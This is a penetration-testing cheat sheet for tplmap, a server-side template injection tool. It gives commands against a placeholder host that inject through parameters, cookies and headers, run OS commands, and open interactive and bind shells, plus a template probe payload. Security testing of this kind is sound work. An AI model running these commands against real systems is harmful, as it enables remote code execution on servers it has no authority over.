tplmap Cheat Sheet
Server-Side Template Injection detection and exploitation for multiple template engines.
Overview
Tplmap detects and exploits SSTI in Python, PHP, Java, and other template engines when user input is rendered server-side. Use on suspected injection points (name, preview, email templates) on authorized apps.
Authorized testing only. Use only on systems, networks, and accounts you own or have explicit written permission to test. Unauthorized access is illegal.
Install
git clone https://github.com/epinna/tplmap.gitcd tplmap && pip install -r requirements.txtEssential commands
Scan URL parameter
./tplmap.py -u "http://target.example/page?name=John"POST body field
./tplmap.py -u "http://target.example/render" -d "template=test"Common workflows
Detect engine and run command —
./tplmap.py -u "http://target.example/hello?name=test" --os-cmd id./tplmap.py -u "http://target.example/hello?name=test" --os-shellCookie or header injection —
./tplmap.py -u "http://target.example/" -H "User-Agent=*"./tplmap.py -u "http://target.example/" -c "preferences=*"Bind shell (when in scope) —
./tplmap.py -u "http://target.example/page?name=x" --bind-shell 4444Manual polyglot probe first —
{{7*7}}${7*7}<%= 7*7 %>Flags reference
-u URL | Target URL with * marker for inject point |
|---|---|
-d DATA | POST data (field=*) |
-c COOKIE | Cookie inject point |
-H HEADER | Header inject point |
--os-cmd | Run OS command |
--os-shell | Interactive shell |
--bind-shell PORT | Bind shell on target |
--reverse-shell HOST:PORT | Reverse shell |
--proxy | HTTP proxy |
--level | Test depth |
-e ENGINE | Force template engine |
Tips
- Mark injection point with ` in URL/data: name=`.
- Start with manual {{7*7}} in Burp; if 49 appears, run tplmap on that parameter.
- Sandbox escapes vary by engine; --os-shell may fail on hardened containers.
- Document engine type in report (Jinja2, Twig, Freemarker, etc.).